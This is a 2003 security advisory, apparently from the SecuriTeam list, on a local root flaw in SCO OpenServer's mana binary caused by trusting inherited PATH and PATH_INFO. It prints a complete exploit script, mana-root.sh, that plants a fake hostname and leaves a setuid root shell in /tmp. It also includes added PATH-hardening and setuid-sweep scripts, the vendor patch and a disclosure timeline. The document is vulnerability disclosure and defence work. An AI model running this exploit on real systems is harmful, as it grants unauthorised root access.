[UNIX] SCO Internet Manager Allows Local Users to Gain Root Level Privileges

From: SecuriTeam (support_at_securiteam.com)
Date: 09/17/03

    To: list@securiteam.com
    Date: 17 Sep 2003 15:38:24 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      SCO Internet Manager Allows Local Users to Gain Root Level Privileges
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in the SCO Internet Manager (mana) allows local attackers
    to gain root privileges. The mana binary trusts the REMOTE_ADDR, PATH_INFO
    and PATH environment variables it inherits from whoever invokes it, so a
    local user can make it execute an attacker-supplied program as root.

    DETAILS

    Vulnerable systems:
     * OpenServer version 5.0.5 up to version 5.0.7

    The SCO Internet Manager (mana) is designed to be run via ncsa_httpd on
    port 615, inside a password-protected area.

    However, running /usr/internet/admin/mana/mana locally is also possible.

    By exporting the environment variable REMOTE_ADDR and setting it to
    127.0.0.1, mana can be tricked into executing the file menu.mana as if it
    had been run from the ncsa_httpd password-protected area.

    Another interesting environment variable is PATH_INFO, which tells mana
    which .mana file should be executed.

    The file pass-err.mana contains the following lines:

      <TCL>
      if {[catch {exec hostname} hostName] != 0} {
          set hostName localhost
      }
      set mana(localHostName) $hostName
      return {}
      </TCL>

    This tells us that mana will execute "hostname" when this file is run.
    Tcl's exec searches PATH for a command name that contains no slash, and
    mana inherits PATH from whoever invoked it.

    Setting PATH_INFO to /pass-err.mana and PATH to ./:$PATH therefore makes
    mana execute ./hostname, an attacker-supplied file in the current
    directory, with root privileges.
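    The PATH lookup described above is the whole bug, and it can be
    reproduced without SCO, root or the mana binary. The script below is an
    added example written for this page, not code from the Texonet advisory
    or from SCO: it plants a fake ./hostname in a scratch directory (one that
    only prints a marker), resolves the bare name "hostname" the way execvp()
    does under the exploit's ./:$PATH and again under a sanitized PATH, and
    shows the hardening a privileged program should apply before exec'ing a
    bare command name: keep only absolute PATH entries (or hard-code an
    absolute path such as /bin/hostname). resolve_in_path is a simplified
    model of the execvp() search, and every directory and file name in it is
    constructed for the demonstration.

```sh
#!/bin/sh
# Added example (not from the Texonet advisory or from SCO): reproduces the
# PATH-lookup trap behind the mana bug without root or the mana binary.
# The fake ./hostname only prints a marker; resolve_in_path is a simplified
# model of the execvp() search that Tcl's exec performs for a bare name.
# All directory and file names here are constructed for the demonstration.

# Scratch directory holding an attacker-controlled ./hostname, mirroring
# what mana-root.sh writes into the current directory. Prints the path.
make_attacker_dir() {
    dir=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho ATTACKER_HOSTNAME_RAN\n' > "$dir/hostname"
    chmod 755 "$dir/hostname"
    echo "$dir"
}

# Resolve a bare command name the way execvp() does: walk $1 (a PATH
# string) left to right and print the first executable named $2.
# An empty entry means the current directory, exactly as in execvp().
resolve_in_path() {
    old_ifs=$IFS
    IFS=:
    for d in $1; do
        case $d in
            "")  d=. ;;
            */)  d=${d%/} ;;    # "./" becomes "."
        esac
        if [ -f "$d/$2" ] && [ -x "$d/$2" ]; then
            IFS=$old_ifs
            echo "$d/$2"
            return 0
        fi
    done
    IFS=$old_ifs
    return 1
}

# Keep only absolute PATH entries; drops "", ".", "./" and any relative
# directory, so a privileged program can never be steered into the
# caller's working directory.
sanitize_path() {
    old_ifs=$IFS
    IFS=:
    out=
    for d in $1; do
        case $d in
            /*) out="${out:+$out:}$d" ;;
        esac
    done
    IFS=$old_ifs
    echo "$out"
}

# From inside the attacker's directory, look up "hostname" with the
# exploit's PATH prefix: the planted file wins.
lookup_with_exploit_path() {
    ( cd "$1" && resolve_in_path "./:$PATH" hostname )
}

# Same lookup after sanitizing PATH: the planted file is never chosen.
lookup_with_sanitized_path() {
    ( cd "$1" && resolve_in_path "$(sanitize_path "./:$PATH")" hostname )
}

# Stand-alone demonstration: build the scratch directory, run both
# lookups, clean up.
demo() {
    dir=$(make_attacker_dir) || return 1
    printf 'exploit PATH   -> %s\n' "$(lookup_with_exploit_path "$dir")"
    printf 'sanitized PATH -> %s\n' \
        "$(lookup_with_sanitized_path "$dir" || echo '(no hostname in sanitized PATH)')"
    rm -rf "$dir"
}
demo
```

    Run it from any unprivileged shell: the exploit-PATH lookup returns
    ./hostname, the sanitized lookup never does. For a binary that a local
    user can start directly, as mana can be, the REMOTE_ADDR check is worth
    nothing either, since the caller chooses the environment; the PATH
    hardening above only closes the particular path to root shown in the
    advisory.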

    Example (Simple POC):
    This proof of concept for OpenServer 5.0.7 should give any local user
    euid=0(root).

    $ uname -a
    SCO_SV openserv 3.2 5.0.7 i386
    $ id
    uid=200(test) gid=50(group) groups=50(group)
    $ sh mana-root.sh
    # id
    uid=200(test) gid=50(group) euid=0(root) groups=50(group)

    Exploit mana-root.sh:
    #!/bin/sh
    #
    # OpenServer 5.0.7 - Local mana root shell
    #

    # Pretend to be a request from the local host so mana skips the
    # ncsa_httpd password protection.
    REMOTE_ADDR=127.0.0.1
    # Ask mana to run pass-err.mana, whose <TCL> block execs "hostname".
    PATH_INFO=/pass-err.mana
    # Put the current directory first in PATH so that exec finds ./hostname.
    PATH=./:$PATH

    export REMOTE_ADDR
    export PATH_INFO
    export PATH

    # The fake hostname: copies /bin/sh to /tmp and makes the copy setuid,
    # which works because mana runs it with euid 0.
    echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

    chmod 755 hostname

    /usr/internet/admin/mana/mana > /dev/null

    # Run the setuid copy to get a shell with euid=0.
    /tmp/sh
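    The payload above leaves a durable artifact: a root-owned copy of /bin/sh
    with mode 4777 in /tmp. The script below is an added example for this
    page, not part of the advisory or of SCO's fix, showing how a defender
    can sweep a world-writable directory for setuid files and tell a copied
    system shell apart from other setuid files. It runs unprivileged, so the
    files it plants for the demonstration are owned by the caller rather
    than root; the scratch directory, the planted files and the list of
    shells it compares against are all assumptions made for the example.

```sh
#!/bin/sh
# Added example (not part of the Texonet advisory or SCO's fix): a small
# sweep for the artifact mana-root.sh leaves behind, a setuid copy of
# /bin/sh in a world-writable directory. Runs unprivileged; the scratch
# directory and the planted files are constructed for the demonstration,
# and the list of shells to compare against is an assumption.

SHELL_CANDIDATES="/bin/sh /bin/ksh /bin/csh /bin/bash"

# Print every regular file under $1 that carries the setuid bit.
# Only POSIX find primaries are used, so it also works on older Unixes.
find_setuid_files() {
    find "$1" -type f -perm -4000 -print 2>/dev/null
}

# Return 0 if $1 is byte-for-byte identical to one of the system shells,
# which is what "cp /bin/sh /tmp; chmod 4777 /tmp/sh" produces.
is_shell_copy() {
    for s in $SHELL_CANDIDATES; do
        [ -f "$s" ] && cmp -s "$1" "$s" && return 0
    done
    return 1
}

# Triage: for each setuid file under $1 print "<path> <verdict>", where
# the verdict is SHELL_COPY or SETUID (anything setuid in a scratch
# directory still deserves a look, but a shell copy is the smoking gun).
triage_setuid() {
    find_setuid_files "$1" | while IFS= read -r f; do
        if is_shell_copy "$f"; then
            printf '%s SHELL_COPY\n' "$f"
        else
            printf '%s SETUID\n' "$f"
        fi
    done
}

# Count setuid files under $1; a cron job can alert when this is non-zero.
count_setuid_files() {
    find_setuid_files "$1" | wc -l | tr -d ' '
}

# Scratch directory with a planted copy of /bin/sh (mode 4755, owned by
# the caller because this runs unprivileged), a setuid script that is not
# a shell copy, and an ordinary file. Prints the directory path.
make_scratch_dir() {
    dir=$(mktemp -d) || return 1
    cp /bin/sh "$dir/sh" && chmod 4755 "$dir/sh"
    printf '#!/bin/sh\necho planted\n' > "$dir/helper" && chmod 4755 "$dir/helper"
    printf 'harmless\n' > "$dir/notes.txt" && chmod 644 "$dir/notes.txt"
    echo "$dir"
}

# Stand-alone run: build the scratch directory, triage it, clean up.
scratch=$(make_scratch_dir) || exit 1
triage_setuid "$scratch"
rm -rf "$scratch"
```

    Pointed at /tmp on a real host the sweep is cheap enough to run from
    cron; on the system in the advisory a hit would look like
    "/tmp/sh SHELL_COPY", with the file owned by root because mana wrote it
    with euid 0.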

    Workaround:
    The proper solution is to install the latest packages.

    Location of fixed binaries:
    ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19

    Installing fixed binaries:
    Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory

    2) Run the custom command, specify an install from media images, and
    specify the /tmp directory as the location of the images.

    Disclosure Timeline:
    9/02/2003: Vendor notified by e-mail
    9/03/2003: Vendor has verified the issue and is working on the solution
    9/15/2003: Public release

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
    http://www.texonet.com/advisories/TEXONET-20030902.txt

    The information has been provided by Texonet (advisories@texonet.com).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ========================================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

